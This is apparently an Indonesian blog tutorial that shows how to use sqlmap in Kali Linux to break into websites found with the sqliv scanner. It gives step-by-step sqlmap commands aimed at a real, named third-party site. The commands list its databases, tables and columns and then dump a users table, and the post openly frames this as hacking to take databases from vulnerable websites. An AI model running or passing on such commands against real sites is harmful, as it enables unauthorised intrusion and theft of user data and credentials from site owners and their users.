Cara Menggunakan SQLMAP di kali linux
hallo gaes, kali ini saya akan membagikan tutorial bagaimana cara menggunakan sqlmap, agar kita bisa melihat data - data penting dari web yang sudah kita cari menggunakan sqliv di tutorial saya sebelumnya, fungsi dari sqlmap ini ialah diguanak untuk sql-injection agar memperoleh remote database dan melakukan hacking
seperti mengekstrak nama database, tabel, kolom, semua data dalam tabel, istilah gampangnya memperoleh database dari web yang memliki celah keamanan. oke langsung simak saja :
1. web vuln yang sudah kita scan menggunakan sqliv
2. sqlmap
langsung simak cara penggunaanya,buka sqlmap dengan perintah :
1. sqlmap
2. sqlmap -u http://www.simtaspa.com/newsite/home.php?idlingua=2 --dbs
+ ini hasil dari perintah --dbs, digunakan untuk memunculkan nama database dari web tersebut
3. sqlmap -u http://www.simtaspa.com/newsite/home.php?idlingua=2 --tables -D Sql500237_1
+ ini hasil dari perintah --tables -D Sql500237_1, digunakan untuk melihat isi tables dari Sql500237_1
4. sqlmap -u http://www.simtaspa.com/newsite/home.php?idlingua=2 --columns -D Sql500237_1 -T pj9ta_users
+ ini hasil dari perintah --columns -D Sql500237_1 -T pj9ta_users digunakan untuk melihat database pada columns pj9ta_users
5. sqlmap -u http://www.simtaspa.com/newsite/home.php?idlingua=2 --dump -D Sql500237_1 -T pj9ta_users
+ini hasil dari perintah --dump -D Sql500237_1 -T pj9ta_users, digunakan untuk mengeluarkan isi database pada columns pj9ta_users
nah kalau sudah slesai kalian dapat melihat hasilnya, kalian dapat melihat database apa saja yang ada di web vuln tersebut, yang sudah kita cari menggunakan sqliv.
kalian bisa request di kolom komentar,tutorial yang kalian belum mengerti, insyallah akan saya buatkan tutorialnya,
sekian tutorial dari saya apabila ada salah kata atau kekeliruan mohon di maafkan.
Tags:
LINUX